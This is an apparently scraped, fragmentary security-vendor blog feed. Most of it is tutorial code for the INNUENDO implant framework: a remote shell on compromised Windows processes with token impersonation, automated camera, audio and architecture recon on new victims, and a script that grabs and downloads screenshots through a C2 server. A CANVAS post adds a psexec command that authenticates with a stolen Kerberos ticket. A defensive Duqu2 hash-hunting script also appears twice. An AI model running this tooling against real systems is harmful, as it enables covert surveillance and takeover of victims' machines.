c.operation_execute('filemanager', 'execute', self.proc_id, args=args)\n c.operation_tag_add(tag, res[0])\n return res[0]\n\n def wait(self, oper_id):\n \"\"\"Waits for *oper_id* to complete and returns the operation.\n\n If a `KeyboardInterrupt` is caught while waiting for the operation,\n the operation will be cancelled, and any processes it started will be\n killed.\n \"\"\"\n c = self.client\n\n try:\n return c.operation_wait(oper_id)[0]\n except KeyboardInterrupt:\n res = c.operation_attributes(oper_id)\n if res['process_id']:\n print 'killing tree: %(process_id)s' % res\n self.kill(res['process_id'])\n c.operation_cancel(oper_id)\n print\n raise\n\n def output(self, oper_id):\n \"\"\"Returns a string containing the stdout and stderr of *oper_id*.\"\"\"\n c = self.client\n\n out = []\n attrs = c.operation_attributes(oper_id)\n\n stdout = attrs['stdout']\n stderr = attrs['stderr']\n if stdout:\n out.append(stdout.rstrip())\n if stderr:\n out.append(stderr.rstrip())\n\n return '\\n'.join(out)\n\n def check_error(self, oper):\n \"\"\"Exits the program if *oper* contains an error.\"\"\"\n if not oper['success']:\n sys.exit('\\n'.join([oper['error'], oper['exception']]))\n\n def kill(self, pid, recurse=True):\n \"\"\"Kills the process with *pid* on the target.\"\"\"\n c = self.client\n return c.operation_execute('manager', 'terminate', self.proc_id, args={\n 'process_id': pid, 'recurse': recurse,\n })\n\n def chdir(self, path):\n \"\"\"Changes the current working directory.\n\n The target is first checked to verify that *path* is valid.\n \"\"\"\n c = self.client\n\n oper_id = self.execute('cd /D %s && cd' % path)\n attrs = c.operation_attributes(oper_id)\n output = self.output(oper_id)\n\n # set the new cwd if the command succeeded\n if attrs['return_code'] == 0:\n self.cwd = output\n else:\n print output\n\n def parse_prompt(self):\n \"\"\"Returns a Windows prompt with codes subtituted with their respective\n values.\n\n Not supported: $+, $M\n \"\"\"\n prompt = self.env.get('PROMPT', PROMPT) if self.prompt is None else self.prompt\n result = []\n for match in rx_prompt.finditer(prompt):\n code = match.group(1).lower()\n result.append({\n 'a': '&',\n 'b': '|',\n 'c': '(',\n 'd': '<current date>', # TODO\n 'e': '\\x27',\n 'f': ')',\n 'g': '>',\n 'h': '\\b',\n 'l': '<',\n 'n': ntpath.splitdrive(self.cwd)[0],\n 'p': self.cwd,\n 'q': '=',\n 's': ' ',\n 't': '<current time>', # TODO\n 'v': self.ver,\n '_': '\\n',\n '$': '$',\n }.get(code, ''))\n return ''.join(result)\n\ndef main():\n import argparse\n\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('process_implant_id')\n parser.add_argument('-c', '--command', help='execute a command then exit')\n parser.add_argument('--no-cache', action='store_false', dest='cached',\n help='do not use cached data for initialization')\n parser.add_argument('--token-user', help='attempt impersonation of a \"[domain\\]user\"')\n parser.add_argument('--token-luid', help='sets a token LUID for impersonation')\n parser.add_argument('-p', '--prompt', help='a windows prompt format string')\n parser.add_argument('-u', '--url', help='rpc server url')\n\n args = parser.parse_args()\n proc_id = args.process_implant_id\n\n c = rpc.Client(args.url)\n\n try:\n c.process_get(proc_id)\n except rpc.RemoteError:\n sys.exit('invalid target process')\n\n if args.command:\n shell = Shell(c, proc_id, args.token_user, args.token_luid)\n oper_id = shell.execute(args.command)\n shell.check_error(shell.wait(oper_id))\n print shell.output(oper_id)\n return\n\n print 'initializing ...'\n shell = Shell(c, proc_id, args.token_user, args.token_luid, args.prompt)\n shell.setup(cached=args.cached)\n\n # Enter REPL\n shell.repl()\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n pass\n
\n>>> import pprint # to make it easier to look through results\n>>> import rpc\n>>> c = rpc.Client()\n>>> for event in c.events():\n... pprint.pprint(event)\nNone\n{'data': {'id': '...'},\n 'name': 'machine_updated',\n 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 890128)}\n{'data': {'id': '...'},\n 'name': 'node_updated',\n 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 927102)}\n{'data': {'id': '...'},\n 'name': 'process_updated',\n 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 957477)}\n
\nimport rpc\n\nclass Monitor(rpc.Client):\n def on_some_event(self, event):\n \"\"\"Called when \"some_event\" is emitted.\"\"\"\n pass\n
\n\n
\n\n def monitor(self):\n \"\"\"Monitors events for any existing event handlers.\"\"\"\n # create an event filter based on the existing handlers\n filter = [n[3:] for n in dir(self) if n.startswith('on_')]\n print 'monitoring: {}'.format(', '.join(filter))\n\n for event in self.events(*filter):\n if not event: continue\n handler = getattr(self, 'on_' + event['name'])\n handler(event)\n
\nclass Monitor(rpc.Client):\n # ... previous code ...\n def on_process_added(self, event):\n # all process events set event['data']['id'] to the relevant\n # process ID \n proc_id = event['data']['id']\n \n # queue some recon operations\n self.operation_execute('recon', 'assign_aliases', proc_id)\n self.operation_execute('recon', 'audio_query', proc_id)\n self.operation_execute('recon', 'camera_query', proc_id)\n
\nclass Monitor(rpc.Client):\n # ... previous code ...\n def on_operation_updated(self, event):\n # all operation events set event['data']['id'] to the relevant\n # operation ID\n oper_id = event['data']['id']\n # using the operation ID, we can retrieve the operation metadata\n oper = self.operation_get(oper_id)\n\n # and we can use the metadata to filter out operations that we're not\n # interested in. In this case, operations that are not finished\n if oper['state'] != 'finished':\n return\n\n # get operation attributes (these are the results)\n attrs = self.operation_attributes(oper['id'])\n\n # handle operation (if a matching 'handle_' method exists)\n handler = getattr(self, 'handle_' + oper['name'], None)
\n if handler:\n # pass in both the operation metadata and attributes\n handler(oper, attrs)\n
\nclass Monitor(rpc.Client):\n # ... previous code ...\n def handle_assign_aliases(self, oper, attrs):\n # assign_aliases offers us a quick way to determine the target's\n # architecture, among other useful bits of info\n arch = attrs['info']['arch']\n\n # let's tag it!\n self.process_tag_add('arch:{}'.format(arch), oper)\n\n def handle_camera_query(self, oper, attrs):\n if attrs['cameras']:\n self.process_tag_add('has:camera', oper['id'])\n else:\n # a camera could be removed, so we should be able to update\n # the tag in that case\n self.process_tag_remove('has:camera', oper['id'])\n\n def handle_audio_query(self, oper, attrs):\n if attrs['devices']:\n self.process_tag_add('has:audio', oper['id'])\n else:\n # audio could be removed, so we should be able to update\n # the tag in that case\n self.process_tag_remove('has:audio', oper['id'])\n
\nimport rpc\n\nclass Monitor(rpc.Client):\n ## operation result handlers ##\n\n def handle_assign_aliases(self, oper, attrs):\n arch = attrs['info']['arch']\n self.process_tag_add('arch:{}'.format(arch), oper['process_id'])\n\n def handle_camera_query(self, oper, attrs):\n if attrs['cameras']:\n self.process_tag_add('has:camera', oper['process_id'])\n else:\n self.process_tag_remove('has:camera', oper['process_id'])\n\n def handle_audio_query(self, oper, attrs):\n if attrs['devices']:\n self.process_tag_add('has:audio', oper['process_id'])\n else:\n self.process_tag_remove('has:audio', oper['process_id'])\n\n ## event handlers ##\n\n def on_process_added(self, event):\n proc_id = event['data']['id']\n \n # queue some recon operations\n self.operation_execute('recon', 'assign_aliases', proc_id)\n self.operation_execute('recon', 'audio_query', proc_id)\n self.operation_execute('recon', 'camera_query', proc_id)\n \n def on_operation_updated(self, event):\n oper_id = event['data']['id']\n oper = self.operation_get(oper_id)\n\n # filter\n if oper['state'] != 'finished':\n return\n\n # get operation attributes\n attrs = self.operation_attributes(oper['id'])\n\n # handle operation\n handler = getattr(self, 'handle_' + oper['name'], None)\n if handler:\n print 'handling operation:', oper['name']\n handler(oper, attrs)\n\n ## monitor ##\n\n def monitor(self):\n \"\"\"Monitors events for any existing event handlers.\"\"\"\n # create an event filter based on the existing handlers\n filter = [n[3:] for n in dir(self) if n.startswith('on_')]\n print 'monitoring: {}'.format(', '.join(filter))\n\n for event in self.events(*filter):\n if not event: continue\n print 'handling event:', event['name']\n handler = getattr(self, 'on_' + event['name'])\n handler(event)\n\nif __name__ == '__main__':\n try:\n Monitor().monitor()\n except KeyboardInterrupt:\n pass\n
\nI didn't realize that I had to blur this out so you stalkers couldn't find my house! Learn something new everyday. |
Illustration 1: Word Macro-Enabled documents in legacy format and OOXML format |
\n | \n 2007 | \n2010 | \n2013 | \n2016 | \n
Security Warning | \nYes | \nYes | \nYes | \nYes | \n
Security Alert Window | \nYes | \nNo | \nNo | \nNo | \n
$ ./innuendo_client.py -u tcp://<c2-host>:9998 ping\nping?\npong!\n
\n>>> import innuendo_client\n
\n>>> from innuendo import rpc\n
\n>>> c = rpc.Client('tcp://<c2-host>:9998')\n>>> c.module_names()\n('exploitmanager', 'recon', ...)\n
\n>>> for event in c.events('process'):\n... proc_id = event['data']['id']\n... proc = c.process_get(proc_id)\n... print proc['name'], proc['machine_alias']\nnetclassmon.exe Windows-7-x64-fuzzybunny\nboot64.exe Windows-7-x64-wombat\nrundll32.exe Windows-XP-x86-cabbage\nboot64.exe Windows-7-x64-fuzzybunny\nboot32.exe Windows-XP-x86-cabbage\n
\n>>> for event in c.events('process_added'):\n... proc_id = event['data']['id']\n... c.operation_execute([proc_id], 'screengrab')\n
\n>>> import msgpack\n>>> res = c.operation_attributes(oper_id)\n>>> attrs = msgpack.unpackb(res)\n
\n>>> server_path = attrs['data'][0]['path']\n
\n>>> local_path = os.path.basename(remote_path)\n>>> with open(local_path, 'w+b') as file:\n... for chunk in c.file_download(remote_path):\n... file.write(chunk)\n
\nimport os\n\n# bootstrap the client environment\nimport innuendo_client\n\nimport msgpack\nfrom innuendo import rpc\n\ndef main():\n print 'waiting'\n \n c = rpc.Client()\n \n # track the operations we want to watch\n oper_ids = set()\n \n for event in c.events('process_added', 'operation_updated'):\n if not event:\n # the server will send out \"heartbeat\" events periodically\n # we can ignore them\n continue\n \n elif event['name'] == 'process_added':\n print 'process_added: taking screenshot'\n \n # grab the ID of the process that just activated\n proc_id = event['data']['id']\n \n # queue a screengrab operation and track it's ID\n res = c.operation_execute([proc_id], 'screengrab', wait=True)\n oper_ids.add(res[0])\n \n print 'operation_added:', res[0]\n \n elif event['name'] == 'operation_updated':\n # grab the ID of the operation that was just updated\n oper_id = event['data']['id']\n \n # make sure it's an operation we are tracking\n if oper_id not in oper_ids:\n continue\n \n # get the operation data so we can check it's state\n oper = c.operation_get(oper_id)\n print 'operation_updated:', oper['state']\n \n # wait until the operation is finished\n if oper['state'] != 'finished':\n continue\n oper_ids.remove(oper_id)\n \n # grab and unpack the operation's attributes\n res = c.operation_attributes(oper_id)\n attrs = msgpack.unpackb(res)\n \n # get the remote path of the first screenshot\n remote_path = attrs['data'][0]['path']\n local_path = os.path.basename(remote_path)\n \n # stream the screenshot to a local file\n with open(local_path, 'w+') as file:\n for chunk in c.file_download(remote_path):\n file.write(chunk)\n print 'saved:', local_path\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n pass\n
\nYou can make your maps in MS Paint or use Google Maps for high quality renditions. Or just start with a blank area (this still works). |
This is what it looks like when your whole organization just got compromised because you sat down at StarBucks for second. |
One of these options is not like the other! Ok it is. Wait. |
---CUT HERE---\n
\n\n\n\n\n\n\n
import sys\nimport os\n\nif \".\" not in sys.path: sys.path.append(\".\")\nif \"../\" not in sys.path: sys.path.append(\"../\")\nif \"../../\" not in sys.path: sys.path.append(\"../../\")\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"webapp.settings\"\n\nfrom home.models import binaries\n\nevil_md5 = [\n'14712103ddf9f6e77fa5c9a3288bd5ee',\n'e8eaec1f021a564b82b824af1dbe6c4d',\n'3fde1bbf3330e0bd0952077a390cef72',\n'2751e4b50a08eb11a84d03f8eb580a4e',\n'e8eaec1f021a564b82b824af1dbe6c4d',\n'520cd9ee4395ee85ccbe073a00649602',\n'acbf2d1f8a419528814b2efa9284ea8b',\n'a6b2ac3ee683be6fbbbab0fa12d88f73',\n'966953034b7d7501906d8b4cd3f90f6b',\n'4b26441166f23bcced22cc0f8588b3dd',\n'cf4a8212034fb2335dc069382fba1fb1',\n'050fbef5c814b2981fa61b7fc6820cbd',\n'0A566B1616C8AFEEF214372B1A0580C7',\n'0EECD17C6C215B358B7B872B74BFD800',\n'4541E850A228EB69FD0F0E924624B245',\n'94C4EF91DFCD0C53A96FDC387F9F9C35',\n'B4AC366E24204D821376653279CBAD86',\n'E8D6B4DADB96DDB58775E6C85B10B6CC',\n'0a566b1616c8afeef214372b1a0580c7',\n'94c4ef91dfcd0c53a96fdc387f9f9c35',\n'e8d6b4dadb96ddb58775e6c85b10b6cc',\n'b4ac366e24204d821376653279cbad86',\n'4541e850a228eb69fd0f0e924624b245',\n'0eecd17c6c215b358b7b872b74bfd800',\n'9749d38ae9b9ddd81b50aad679ee87ec',\n'3d83b077d32c422d6c7016b5083b9fc2',\n'C9A31EA148232B201FE7CB7DB5C75F5E',\n'9749d38ae9b9ddd81b50aad679ee87ec',\n'4c804ef67168e90da2c3da58b60c3d16',\n'856a13fcae0407d83499fc9c3dd791ba',\n'92aa68425401ffedcfba4235584ad487',\n'c9a31ea148232b201fe7cb7db5c75f5e',\n'f60968908f03372d586e71d87fe795cd',\n'3d83b077d32c422d6c7016b5083b9fc2',\n'bdb562994724a35a1ec5b9e85b8e054f',\n'164aa9cd56d900341535551464af43b7',\n'66a7e49ef0ebf10fb54621861c6dbfff',\n'dccffd4d2fc6a602bea8fdc1fa613dd4',\n'a0a976215f619a33bf7f52e85539a513',\n'a1d2a954388775513b3c7d95ab2c9067',\n'3B51F48378A26F664BF26B32496BD72A',\n'4c804ef67168e90da2c3da58b60c3d16',\n'f5ee03fed0133bb06d4cc52b0232fec0',\n'9a9e77d2b7792fbbddcd7ce05a4eb26e',\n\"107403e1259427355757b70b4d820997\",\n\"653e375d6455850fd76453dc5d713257\",\n\"c03ca7ea50a52e9e7d1f3ff17e68f7da\",\n\"45a7b2c4792803da5c79d61982e3ed38\",\n\"9fce104aab41e80236b073f4db54910d\",\n\"83b37e8df59051ee623da1c310fb4e8c\",\n\"8d80ba2dce3bd625babc25858b55375d\",\n\"af2b0ee182d9f48c293a80f762171d40\",\n\"4a9f5b4f549f43d4f96136c81a043631\",\n\"d4b3ef7b4d1c4b64c5146f02eab830a8\",\n\"ef460a40c5d399942ae32c23e63a8d10\",\n\"c80cd91848515b7973145a574440ca12\",\n\"9bc2aa9eb49c938eb47660b087654b9c\",\n\"75f0cda10d65f0865f92e9b7cd6a56de\",\n\"4e69bf01720ae8c13c48943d1f512d8e\",\n\"79fe76fc991a2f36e318c710e6684cca\",\n\"aa6fcf2594393784f4602f9d1d8cbaa0\",\n\"3af67c17dc76bcb7c7eb53b3e164a969\",\n\"e4bb017843c538cc821162a4ef64d833\",\n\"2684c847218745d2809d8c1c40588491\",\n\"7d6fe14a4817d1eae16b926cd6af00b4\",\n\"57090c92892406afe6207b6eefe44ce6\",\n\"a6fd9fc574c4a2b592c82892e5aff77d\",\n\"9daf29a0dd6eccec1093bef3fa3ec4f9\",\n\"45a416431dadda14361eff64fa52afde\",\n\"0c07e033975168de1ed461786a1bd4b7\",\n\"05cfbb2cef37ac1f3cded2a54663e0c4\",\n\"442d72f42e391c988e0fcda73488636a\",\n\"0e51ef79713229c6df6ed567214e4bcb\",\n\"ea05fd5e14bbb68be30d51d213f84f3d\",\n\"bcae43d8f2d4f5b67a84da218aeddd0e\",\n\"069701725a8fa9ab47a130e7e9879211\",\n\"6ab58775a586249dcc608efa47e5eabf\",\n\"9f5457c2514e3bcb61c4b6a14a507336\",\n\"941b051d857cdafb4c2d04f6246cd7ac\",\n\"d00fd4059c855d6c22a1d0a993d784af\",\n\"5ffbf53cc0fa2c61b1cd8d48a57d976a\",\n\"c81285c9763795df3b24ba1db002b352\",\n\"934d5d68f0632531844fcd9180fa65f2\",\n\"cee6703d62a6f334ecb9a43a2db904cd\",\n\"dd5013f4537e7dcf3579ab125bbb48e3\",\n\"4d8efdac702af5ff0c9edaad5401f567\",\n\"b507fac3b8b94f7b0c6aedafd3a72cbe\",\n\"d612393cda4228df8d43678171e273da\",\n\"9a11b52ceee6f2fb1fa7f4fb5fee3c49\",\n\"f4743b2df3c3e02dfbbd742475236033\",\n\"8d2421d5518c16e392fbe9e2ef88419d\",\n\"be04a3abec6f06761004053f13eed1b8\",\n\"e09bad51cf748abdc1913367770a7a83\",\n\"d5ce8c7456e444ef939a42be8e00a31c\",\n\"dbe43f68bfb0e670cdcb4ede143db1ef\",\n\"725b02ca7cfb061bfafccee3c15672c2\",\n\"cb5cf3dbcadc6bae90830a6735ac2419\",\n\"8f8054da6c80a2785d8c913ba1ea0a64\",\n\"24ca17f51e73037aeb708ae96a4a939f\",\n\"f624119e06773f4c88607f46fae3ebba\",\n\"6edf091a408c33d7e9dd1e0341a3e19e\",\n\"0d63aadacfdd57754b903af3a60627b8\",\n\"2d54a71c7d4cd203dbdfcecd7329fc23\",\n\"d1ec90731409c24c8fbdc5d1b39703bc\",\n\"147126b7328ac42b0bfd6470ef809360\",\n\"39b36b47e7afd8d7866ffe6466b2eb0a\",\n\"2cf6ee0a02b34d2257d92b4c1501d61e\",\n\"0d7156f407f57f92ba3aaa19bc3ef304\",\n\"9e2add724fbe409429bdb0e212cdcc5e\",\n\"f2e5987ab9db1c2f79a298636e1a87d2\",\n\"f3d2dfa10cf1c7fc07bc76be98c1c008\",\n\"52944779ddbbb31db9730b9971aeda06\",\n\"6f967c2029844a9ba85de9fcb2c02b62\",\n\"427168da8d933e125e43c50060d8ddd8\",\n\"4bc2f1fa6d3bd027157f8b74dcee1910\",\n\"2aedf87c810d05796cac4f8f92ffe9f0\",\n\"0a9c596cace74595abbc630600c16827\",\n\"5b64ea57526948dc9d2f9b59ead21181\",\n\"13eaed09d79557b95daf74c845f2b957\",\n\"8c52ffd05e83528cabae0ebd2e22b4f0\",\n\"c96b80c1faa5986e5185ca0f1eefe7e4\",\n\"de8eaa4b7960cc99b63eb0d4fef6b02b\",\n\"b2f46de730bdd975094890dbea10184c\",\n\"390d3abb7e34470a788b8972630d8583\",\n\"823431ce0530d924fb96d3ca72685b07\",\n\"f2c520cf776a69cf03bbfb4965de569f\",\n\"efb33147c3ba73e1dd0ce6665a3257e4\",\n\"9f430a2a8f74d37b5f488fb1eb001222\",\n\"7a3041f198e1678c77efb3e8d628b6dd\",\n\"2137d67f22aae1dc4b88f6d3269e991d\",\n\"fb367a128574cb35c29099ebcec4635c\",\n\"53a94a60f56591042c597b0078b127f9\",\n\"1f17e12478cbec4e602426e37ab850bc\",\n\"7b99589452f1852ec24d9a2320e18ddc\",\n\"8dc6da7c18a59775ecd6522b5a4300b3\",\n\"4623ac239145f8c8a1c4ab39f6bee2b0\",\n\"9b13e9893cd890c6ac58b094582c2f82\",\n\"01ee87ba582da9c38b1e9c27e97d9d2c\",\n\"6ca125f46d1b443eca20574dd8695fba\",\n\"9cf0bf3d7a4f9655205b3cc1a50fe1e7\",\n]\n\nbinaries_hashes = set([b.binary_md5 for b in binaries.objects.all()])\nfiltered_hashes = list(set(evil_md5))\nprint 'Found %d binaries' % len(binaries_hashes)\nprint 'Tesing against %d duqu md5 hashes' % len(filtered_hashes)\n\nfor md5_hash in list(set(filtered_hashes)):\n if md5_hash in binaries_hashes:\n print 'Found hash %s' % md5_hash\n\n\n"],"link":["https://immunityproducts.blogspot.com/2015/06/look-for-duqu2-across-all-time-and-space.html"],"author":["noreply@blogger.com (Dave Aitel)"],"thr:total":["0"],"text_description":"If you are running El Jefe than you can just use the below script to test for any possible Duqu2 infections that have occured across your network for all time (assuming they didn't recompile specifically for you, which is very possible).\n\nAny user of El Jefe can run this script by putting it inside the eljefe/webapp/scripts folder. Of course, if you get a hit, you can examine the machines that were infected much more closely in the GUI itself.\n\nHappy \"Hunting\" :)\n\n\n\n\n\n\n\n---CUT HERE---\n\n\n\n\n\n\n\nimport sys\nimport os\n\nif \".\" not in sys.path: sys.path.append(\".\")\nif \"../\" not in sys.path: sys.path.append(\"../\")\nif \"../../\" not in sys.path: sys.path.append(\"../../\")\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"webapp.settings\"\n\nfrom home.models import binaries\n\nevil_md5 = [\n'14712103ddf9f6e77fa5c9a3288bd5ee',\n'e8eaec1f021a564b82b824af1dbe6c4d',\n'3fde1bbf3330e0bd0952077a390cef72',\n'2751e4b50a08eb11a84d03f8eb580a4e',\n'e8eaec1f021a564b82b824af1dbe6c4d',\n'520cd9ee4395ee85ccbe073a00649602',\n'acbf2d1f8a419528814b2efa9284ea8b',\n'a6b2ac3ee683be6fbbbab0fa12d88f73',\n'966953034b7d7501906d8b4cd3f90f6b',\n'4b26441166f23bcced22cc0f8588b3dd',\n'cf4a8212034fb2335dc069382fba1fb1',\n'050fbef5c814b2981fa61b7fc6820cbd',\n'0A566B1616C8AFEEF214372B1A0580C7',\n'0EECD17C6C215B358B7B872B74BFD800',\n'4541E850A228EB69FD0F0E924624B245',\n'94C4EF91DFCD0C53A96FDC387F9F9C35',\n'B4AC366E24204D821376653279CBAD86',\n'E8D6B4DADB96DDB58775E6C85B10B6CC',\n'0a566b1616c8afeef214372b1a0580c7',\n'94c4ef91dfcd0c53a96fdc387f9f9c35',\n'e8d6b4dadb96ddb58775e6c85b10b6cc',\n'b4ac366e24204d821376653279cbad86',\n'4541e850a228eb69fd0f0e924624b245',\n'0eecd17c6c215b358b7b872b74bfd800',\n'9749d38ae9b9ddd81b50aad679ee87ec',\n'3d83b077d32c422d6c7016b5083b9fc2',\n'C9A31EA148232B201FE7CB7DB5C75F5E',\n'9749d38ae9b9ddd81b50aad679ee87ec',\n'4c804ef67168e90da2c3da58b60c3d16',\n'856a13fcae0407d83499fc9c3dd791ba',\n'92aa68425401ffedcfba4235584ad487',\n'c9a31ea148232b201fe7cb7db5c75f5e',\n'f60968908f03372d586e71d87fe795cd',\n'3d83b077d32c422d6c7016b5083b9fc2',\n'bdb562994724a35a1ec5b9e85b8e054f',\n'164aa9cd56d900341535551464af43b7',\n'66a7e49ef0ebf10fb54621861c6dbfff',\n'dccffd4d2fc6a602bea8fdc1fa613dd4',\n'a0a976215f619a33bf7f52e85539a513',\n'a1d2a954388775513b3c7d95ab2c9067',\n'3B51F48378A26F664BF26B32496BD72A',\n'4c804ef67168e90da2c3da58b60c3d16',\n'f5ee03fed0133bb06d4cc52b0232fec0',\n'9a9e77d2b7792fbbddcd7ce05a4eb26e',\n\"107403e1259427355757b70b4d820997\",\n\"653e375d6455850fd76453dc5d713257\",\n\"c03ca7ea50a52e9e7d1f3ff17e68f7da\",\n\"45a7b2c4792803da5c79d61982e3ed38\",\n\"9fce104aab41e80236b073f4db54910d\",\n\"83b37e8df59051ee623da1c310fb4e8c\",\n\"8d80ba2dce3bd625babc25858b55375d\",\n\"af2b0ee182d9f48c293a80f762171d40\",\n\"4a9f5b4f549f43d4f96136c81a043631\",\n\"d4b3ef7b4d1c4b64c5146f02eab830a8\",\n\"ef460a40c5d399942ae32c23e63a8d10\",\n\"c80cd91848515b7973145a574440ca12\",\n\"9bc2aa9eb49c938eb47660b087654b9c\",\n\"75f0cda10d65f0865f92e9b7cd6a56de\",\n\"4e69bf01720ae8c13c48943d1f512d8e\",\n\"79fe76fc991a2f36e318c710e6684cca\",\n\"aa6fcf2594393784f4602f9d1d8cbaa0\",\n\"3af67c17dc76bcb7c7eb53b3e164a969\",\n\"e4bb017843c538cc821162a4ef64d833\",\n\"2684c847218745d2809d8c1c40588491\",\n\"7d6fe14a4817d1eae16b926cd6af00b4\",\n\"57090c92892406afe6207b6eefe44ce6\",\n\"a6fd9fc574c4a2b592c82892e5aff77d\",\n\"9daf29a0dd6eccec1093bef3fa3ec4f9\",\n\"45a416431dadda14361eff64fa52afde\",\n\"0c07e033975168de1ed461786a1bd4b7\",\n\"05cfbb2cef37ac1f3cded2a54663e0c4\",\n\"442d72f42e391c988e0fcda73488636a\",\n\"0e51ef79713229c6df6ed567214e4bcb\",\n\"ea05fd5e14bbb68be30d51d213f84f3d\",\n\"bcae43d8f2d4f5b67a84da218aeddd0e\",\n\"069701725a8fa9ab47a130e7e9879211\",\n\"6ab58775a586249dcc608efa47e5eabf\",\n\"9f5457c2514e3bcb61c4b6a14a507336\",\n\"941b051d857cdafb4c2d04f6246cd7ac\",\n\"d00fd4059c855d6c22a1d0a993d784af\",\n\"5ffbf53cc0fa2c61b1cd8d48a57d976a\",\n\"c81285c9763795df3b24ba1db002b352\",\n\"934d5d68f0632531844fcd9180fa65f2\",\n\"cee6703d62a6f334ecb9a43a2db904cd\",\n\"dd5013f4537e7dcf3579ab125bbb48e3\",\n\"4d8efdac702af5ff0c9edaad5401f567\",\n\"b507fac3b8b94f7b0c6aedafd3a72cbe\",\n\"d612393cda4228df8d43678171e273da\",\n\"9a11b52ceee6f2fb1fa7f4fb5fee3c49\",\n\"f4743b2df3c3e02dfbbd742475236033\",\n\"8d2421d5518c16e392fbe9e2ef88419d\",\n\"be04a3abec6f06761004053f13eed1b8\",\n\"e09bad51cf748abdc1913367770a7a83\",\n\"d5ce8c7456e444ef939a42be8e00a31c\",\n\"dbe43f68bfb0e670cdcb4ede143db1ef\",\n\"725b02ca7cfb061bfafccee3c15672c2\",\n\"cb5cf3dbcadc6bae90830a6735ac2419\",\n\"8f8054da6c80a2785d8c913ba1ea0a64\",\n\"24ca17f51e73037aeb708ae96a4a939f\",\n\"f624119e06773f4c88607f46fae3ebba\",\n\"6edf091a408c33d7e9dd1e0341a3e19e\",\n\"0d63aadacfdd57754b903af3a60627b8\",\n\"2d54a71c7d4cd203dbdfcecd7329fc23\",\n\"d1ec90731409c24c8fbdc5d1b39703bc\",\n\"147126b7328ac42b0bfd6470ef809360\",\n\"39b36b47e7afd8d7866ffe6466b2eb0a\",\n\"2cf6ee0a02b34d2257d92b4c1501d61e\",\n\"0d7156f407f57f92ba3aaa19bc3ef304\",\n\"9e2add724fbe409429bdb0e212cdcc5e\",\n\"f2e5987ab9db1c2f79a298636e1a87d2\",\n\"f3d2dfa10cf1c7fc07bc76be98c1c008\",\n\"52944779ddbbb31db9730b9971aeda06\",\n\"6f967c2029844a9ba85de9fcb2c02b62\",\n\"427168da8d933e125e43c50060d8ddd8\",\n\"4bc2f1fa6d3bd027157f8b74dcee1910\",\n\"2aedf87c810d05796cac4f8f92ffe9f0\",\n\"0a9c596cace74595abbc630600c16827\",\n\"5b64ea57526948dc9d2f9b59ead21181\",\n\"13eaed09d79557b95daf74c845f2b957\",\n\"8c52ffd05e83528cabae0ebd2e22b4f0\",\n\"c96b80c1faa5986e5185ca0f1eefe7e4\",\n\"de8eaa4b7960cc99b63eb0d4fef6b02b\",\n\"b2f46de730bdd975094890dbea10184c\",\n\"390d3abb7e34470a788b8972630d8583\",\n\"823431ce0530d924fb96d3ca72685b07\",\n\"f2c520cf776a69cf03bbfb4965de569f\",\n\"efb33147c3ba73e1dd0ce6665a3257e4\",\n\"9f430a2a8f74d37b5f488fb1eb001222\",\n\"7a3041f198e1678c77efb3e8d628b6dd\",\n\"2137d67f22aae1dc4b88f6d3269e991d\",\n\"fb367a128574cb35c29099ebcec4635c\",\n\"53a94a60f56591042c597b0078b127f9\",\n\"1f17e12478cbec4e602426e37ab850bc\",\n\"7b99589452f1852ec24d9a2320e18ddc\",\n\"8dc6da7c18a59775ecd6522b5a4300b3\",\n\"4623ac239145f8c8a1c4ab39f6bee2b0\",\n\"9b13e9893cd890c6ac58b094582c2f82\",\n\"01ee87ba582da9c38b1e9c27e97d9d2c\",\n\"6ca125f46d1b443eca20574dd8695fba\",\n\"9cf0bf3d7a4f9655205b3cc1a50fe1e7\",\n]\n\nbinaries_hashes = set([b.binary_md5 for b in binaries.objects.all()])\nfiltered_hashes = list(set(evil_md5))\nprint 'Found %d binaries' % len(binaries_hashes)\nprint 'Tesing against %d duqu md5 hashes' % len(filtered_hashes)\n\nfor md5_hash in list(set(filtered_hashes)):\n if md5_hash in binaries_hashes:\n print 'Found hash %s' % md5_hash\n\n\n"},{"guid":[{"_":"tag:blogger.com,1999:blog-7337853103195839314.post-7213695399783019028","$":{"isPermaLink":"false"}}],"pubDate":["Fri, 06 Mar 2015 14:22:00 +0000"],"atom:updated":["2015-03-06T06:52:18.073-08:00"],"category":[{"_":"CANVAS","$":{"domain":"http://www.blogger.com/atom/ns#"}}],"title":["CANVAS - Psexec & Kerberos credentials"],"description":["
Computing the NTLM hash |
Using the NTLM hash in the CLI |
Artificially generating a Kerberos TGT |
Using a Kerberos credential file to compromise the target |
Target is owned! |
$ python exploits/psexec/psexec.py -t 192.168.0.1 -p 445 -Ocmd:\"mybinary mybinaryargument\" -Ouser:administrator -Odomain:IMMU2.COM -Okrb5_ccache:/tmp/krb5cc_1000 -Olocal_upl:/tmp/BABAR -Oremote_path_upl:\"C:\\\\\"\n
Ticket is extracted and saved (oops small typo in the module code :P) |
The previous relative path is specified (although cut by the GUI here) |
USB Relationship Map |
This Huawei 3G Modem has been used on two workstations. Why are we even using Huawei modems?!? |
This list of USB devices on the endpoints has beautiful Christmas colors. |
Event view |
BKav identifies the binary as a KeyLogger |
ExecutionFilter will be triggered when a binary filepath is on our blacklist |
A simple action that will print the username, ip and binary executed |
Adding a working filter |
Gotcha! You should never do your math homework on a compromised machine! |
Configure a remote Sandbox Virtual Machine |
Select the right Sandbox Virtual Machine to run your sample |
Integration with CAMAL |
Set-up your client completely from the WebUI |
sha1sum: b8ee361ecf67e76ec0888e570153f76b15dfcea5 eljefe2.1.release.tar.gz\n
$ sudo apt-get install python python-sqlalchemy python-bson python-pip libcap2-bin\n $ sudo pip install sqlalchemy bson Django\n
$ sudo setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
\n$ getcap /usr/sbin/tcpdump\n /usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip\n
$ sudo adduser cuckoo
